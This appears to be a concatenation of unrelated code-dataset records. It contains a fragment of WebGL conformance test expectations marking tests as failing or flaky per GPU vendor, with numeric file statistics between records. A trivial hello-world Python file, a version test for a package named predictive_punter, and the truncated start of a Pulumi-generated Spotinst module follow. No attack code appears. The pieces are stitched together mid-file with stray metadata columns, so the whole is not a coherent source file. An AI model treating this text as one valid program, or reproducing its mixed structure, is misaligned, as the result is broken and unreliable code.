['mac', 'intel'], bug=641209)
self.Fail('deqp/functional/gles3/texturefiltering/2d_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/' +
'cube_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/' +
'2d_array_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_06.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_07.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_08.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texturelod.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texturegrad.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'textureprojgrad.html',
['mac', 'intel'], bug=483282)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-r8ui-red_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/misc/' +
'integer-cubemap-texture-sampling.html',
['mac', 'intel'], bug=658930)
# Linux only.
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_byte.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_short_4_4_4_4.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_short_5_5_5_1.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgb-rgb-unsigned_byte.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgb-rgb-unsigned_short_5_6_5.html',
['linux'], bug=627525)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-nv-driver-bug.html',
['linux'], bug=483282)
self.Fail('conformance2/textures/image_bitmap_from_image/' +
'tex-3d-r16f-red-float.html', ['linux'], bug=679695)
# Linux Multi-vendor failures.
self.Skip('deqp/data/gles3/shaders/qualification_order.html',
['linux', 'amd', 'intel'], bug=483282)
self.Flaky('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['linux', 'amd', 'intel'], bug=618447)
self.Fail('conformance2/rendering/clipping-wide-points.html',
['linux', 'amd', 'intel'], bug=662644) # WebGL 2.0.1
# Linux NVIDIA
# This test is flaky both with and without ANGLE.
self.Flaky('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['linux', 'nvidia'], bug=618447)
self.Fail('conformance/glsl/bugs/unary-minus-operator-float-bug.html',
['linux', 'nvidia'], bug=672380)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'nvidia'], bug=709351)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-3d-srgb8_alpha8-rgba-unsigned_byte.html',
['linux', 'nvidia'], bug=679677)
self.Fail('conformance2/rendering/framebuffer-texture-level1.html',
['linux', 'nvidia', 'opengl'], bug=680278)
self.Fail('conformance2/textures/image/' +
'tex-3d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('nvidia', 0xf02)], bug=680282)
self.Flaky('conformance2/textures/image_bitmap_from_image_data/' +
'tex-2d-srgb8-rgb-unsigned_byte.html',
['linux', 'nvidia'], bug=694354)
# Linux NVIDIA Quadro P400
# This test causes a lost device and then the next test fails.
self.Skip('conformance2/rendering/blitframebuffer-size-overflow.html',
['linux', ('nvidia', 0x1cb3)], bug=709320)
# Linux Intel
self.Fail('conformance2/extensions/ext-color-buffer-float.html',
['linux', 'intel'], bug=640389)
self.Fail('WebglExtension_EXT_disjoint_timer_query_webgl2',
['linux', 'intel'], bug=687210)
# See https://bugs.freedesktop.org/show_bug.cgi?id=94477
self.Skip('conformance/glsl/bugs/temp-expressions-should-not-crash.html',
['linux', 'intel'], bug=540543) # GPU timeout
self.Fail('deqp/functional/gles3/fbomultisample.8_samples.html',
['linux', 'intel'], bug=635528)
self.Fail('conformance2/textures/misc/tex-subimage3d-pixel-buffer-bug.html',
['linux', 'intel'], bug=662644) # WebGL 2.0.1
self.Fail('deqp/functional/gles3/shadertexturefunction/texturesize.html',
['linux', 'intel'], bug=666384)
self.Fail('conformance2/textures/misc/tex-3d-mipmap-levels-intel-bug.html',
['linux', 'intel'], bug=666384)
# Fails on Intel Mesa GL 3.3, passes on Intel Mesa GL 4.5.
self.Fail('conformance2/misc/views-with-offsets.html',
['linux', 'intel', 'no_angle'], bug=664180)
# Linux Intel with ANGLE only
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['linux', 'intel', 'opengl'], bug=598902)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'intel', 'opengl'], bug=680276)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'intel', 'opengl'], bug=680276)
# Linux Intel HD 530
self.Fail('conformance/extensions/webgl-compressed-texture-astc.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-filter-outofbounds.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'intel', 'no_angle'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'intel', 'no_angle'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_00.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/glsl3/' +
'vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'intel'], bug=709874)
# Intermittently running out of memory.
self.Flaky('deqp/functional/gles3/texturefiltering/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/textureformat/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/textureshadow/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/texturespecification/*',
['linux', 'intel'], bug=725664)
# Linux AMD only.
# It looks like AMD shader compiler rejects many valid ES3 semantics.
self.Fail('conformance/glsl/misc/shaders-with-invariance.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'amd'], bug=709351)
self.Fail('deqp/functional/gles3/multisample.html',
['linux', 'amd'], bug=617290)
self.Fail('deqp/data/gles3/shaders/conversions.html',
['linux', 'amd'], bug=483282)
self.Skip('deqp/data/gles3/shaders/arrays.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/internalformatquery.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturestatequery.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/buffercopy.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/samplerobject.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shaderprecision_int.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturefiltering/3d*',
['linux', 'amd'], bug=606114)
self.Fail('deqp/functional/gles3/shadertexturefunction/texture.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/texturegrad.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texelfetchoffset.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/vertexarrays/' +
'single_attribute.first.html',
['linux', 'amd'], bug=694877)
self.Fail('deqp/functional/gles3/negativetextureapi.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/array_separate*.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/misc/uninitialized-test-2.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/reading/read-pixels-from-fbo-test.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'amd'], bug=634525)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'amd'], bug=662644) # WebGL 2.0.1
self.Fail('conformance2/renderbuffers/framebuffer-texture-layer.html',
['linux', 'amd'], bug=295792)
self.Fail('conformance2/textures/misc/tex-mipmap-levels.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/textures/misc/copy-texture-image-luma-format.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_params.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_depth_pbo.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_copyteximage2d.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage2d_format_depth_stencil.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_depth_stencil.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_size.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/vertexarrays/' +
'single_attribute.output_type.unsigned_int.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/draw/*.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/fbomultisample*',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/fbocompleteness.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/textureshadow/*.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_highp.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_lowp.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_mediump.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/pre_decrement.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_00.html',
['linux', 'amd'], bug=658832)
self.Fail('deqp/functional/gles3/shaderoperator/unary_operator_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shaderoperator/unary_operator_02.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/glsl3/vector-dynamic-indexing.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/reading/read-pixels-pack-parameters.html',
['linux', 'amd', 'no_angle'], bug=483282)
self.Fail('conformance2/textures/misc/tex-unpack-params.html',
['linux', 'amd', 'no_angle'], bug=483282)
self.Fail('conformance2/extensions/ext-color-buffer-float.html',
['linux', 'amd'], bug=633022)
self.Fail('conformance2/rendering/blitframebuffer-filter-outofbounds.html',
['linux', 'amd'], bug=655147)
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['linux', 'amd'], bug=705865)
self.Fail('conformance2/textures/image/' +
'tex-2d-r11f_g11f_b10f-rgb-float.html',
['linux', 'amd'], bug=705865)
# Uniform buffer related failures
self.Fail('deqp/functional/gles3/uniformbuffers/single_struct_array.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/single_nested_struct.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/' +
'single_nested_struct_array.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/multi_basic_types.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/multi_nested_struct.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/random.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/buffers/uniform-buffers.html',
['linux', 'amd'], bug=658842)
self.Fail('conformance2/rendering/uniform-block-buffer-size.html',
['linux', 'amd'], bug=658844)
# Linux AMD R7 240
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-half_float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba32f-rgba-float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba4-rgba-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba4-rgba-unsigned_short_4_4_4_4.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb565-rgb-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb565-rgb-unsigned_short_5_6_5.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb5_a1-rgba-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
# Conflicting expectations to test that the
# "Expectations have no collisions" unittest works.
# page_name = 'conformance/glsl/constructors/glsl-construct-ivec4.html'
# Conflict when all conditions match
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflict when all conditions match (and different sets)
# self.Fail(page_name,
# ['linux', 'win', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['linux', 'mac', ('nvidia', 0x1), 'amd', 'debug', 'opengl'])
# Conflict with one aspect not specified
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflict with one aspect not specified (in both conditions)
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# Conflict even if the GPU is specified in a device ID
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', 'nvidia', 'debug'])
# Test there are no conflicts between two different devices
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x2), 'debug'])
# Test there are no conflicts between two devices with different vendors
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('amd', 0x1), 'debug'])
# Conflicts if there is a device and nothing specified for the other's
# GPU vendors
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', 'debug'])
# Test no conflicts happen when only one aspect differs
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['win', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflicts if between a generic os condition and a specific version
# self.Fail(page_name,
# ['xp', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['win', ('nvidia', 0x1), 'debug', 'opengl'])
| 47.931389
| 81
| 0.650462
| 6,455
| 55,888
| 5.534934
| 0.098528
| 0.081057
| 0.122313
| 0.128695
| 0.844548
| 0.814795
| 0.780648
| 0.75431
| 0.717393
| 0.668523
| 0
| 0.084358
| 0.172148
| 55,888
| 1,165
| 82
| 47.972532
| 0.687855
| 0.082218
| 0
| 0.673319
| 0
| 0.00105
| 0.542345
| 0.457166
| 0
| 0
| 0.010242
| 0
| 0
| 1
| 0.002101
| false
| 0.063025
| 0.00105
| 0
| 0.004202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
3f0a75d7e38c23741bcc1b35cd2e52d04d871cbd
| 105
|
py
|
Python
|
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | 1
|
2019-04-21T12:07:20.000Z
|
2019-04-21T12:07:20.000Z
|
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | null | null | null |
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
def hello():
    """Return the greeting string ``"hello world"``."""
    # Removed dead commented-out Python 2 `print` statement that
    # duplicated the return value.
    return "hello world"
| 13.125
| 24
| 0.628571
| 15
| 105
| 4.4
| 0.8
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.219048
| 105
| 7
| 25
| 15
| 0.792683
| 0.52381
| 0
| 0
| 0
| 0
| 0.23913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3f42eb97646f4abc56713bf75bf7b85a199dd35d
| 183
|
py
|
Python
|
tests/predictive_punter_test.py
|
justjasongreen/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 6
|
2018-08-28T16:26:44.000Z
|
2021-04-20T17:33:44.000Z
|
tests/predictive_punter_test.py
|
predictive-punter/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 39
|
2016-07-22T08:14:33.000Z
|
2016-08-01T14:13:26.000Z
|
tests/predictive_punter_test.py
|
predictive-punter/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 2
|
2016-12-15T06:03:57.000Z
|
2020-01-13T14:25:11.000Z
|
import predictive_punter
def test_version():
    """predictive_punter.__version__ should return the correct version string"""
    expected_version = '1.0.0a4'
    actual_version = predictive_punter.__version__
    assert actual_version == expected_version
| 22.875
| 80
| 0.765027
| 22
| 183
| 5.818182
| 0.681818
| 0.375
| 0.359375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025478
| 0.142077
| 183
| 7
| 81
| 26.142857
| 0.789809
| 0.382514
| 0
| 0
| 0
| 0
| 0.065421
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
451dfe8ec28156eda59f215cd42feefeb2c7332f
| 401,955
|
py
|
Python
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2019-12-21T20:50:43.000Z
|
2021-12-01T20:57:38.000Z
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 103
|
2019-12-09T22:03:16.000Z
|
2022-03-30T17:07:34.000Z
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'BeanstalkDeploymentPreferencesArgs',
'BeanstalkDeploymentPreferencesStrategyArgs',
'BeanstalkManagedActionsArgs',
'BeanstalkManagedActionsPlatformUpdateArgs',
'BeanstalkScheduledTaskArgs',
'ElastigroupCpuOptionsArgs',
'ElastigroupEbsBlockDeviceArgs',
'ElastigroupEphemeralBlockDeviceArgs',
'ElastigroupInstanceTypesWeightArgs',
'ElastigroupIntegrationBeanstalkArgs',
'ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs',
'ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs',
'ElastigroupIntegrationBeanstalkManagedActionsArgs',
'ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs',
'ElastigroupIntegrationCodedeployArgs',
'ElastigroupIntegrationCodedeployDeploymentGroupArgs',
'ElastigroupIntegrationDockerSwarmArgs',
'ElastigroupIntegrationDockerSwarmAutoscaleDownArgs',
'ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs',
'ElastigroupIntegrationEcsArgs',
'ElastigroupIntegrationEcsAutoscaleAttributeArgs',
'ElastigroupIntegrationEcsAutoscaleDownArgs',
'ElastigroupIntegrationEcsAutoscaleHeadroomArgs',
'ElastigroupIntegrationEcsBatchArgs',
'ElastigroupIntegrationGitlabArgs',
'ElastigroupIntegrationGitlabRunnerArgs',
'ElastigroupIntegrationKubernetesArgs',
'ElastigroupIntegrationKubernetesAutoscaleDownArgs',
'ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs',
'ElastigroupIntegrationKubernetesAutoscaleLabelArgs',
'ElastigroupIntegrationMesosphereArgs',
'ElastigroupIntegrationMultaiRuntimeArgs',
'ElastigroupIntegrationNomadArgs',
'ElastigroupIntegrationNomadAutoscaleConstraintArgs',
'ElastigroupIntegrationNomadAutoscaleDownArgs',
'ElastigroupIntegrationNomadAutoscaleHeadroomArgs',
'ElastigroupIntegrationRancherArgs',
'ElastigroupIntegrationRoute53Args',
'ElastigroupIntegrationRoute53DomainArgs',
'ElastigroupIntegrationRoute53DomainRecordSetArgs',
'ElastigroupItfArgs',
'ElastigroupItfLoadBalancerArgs',
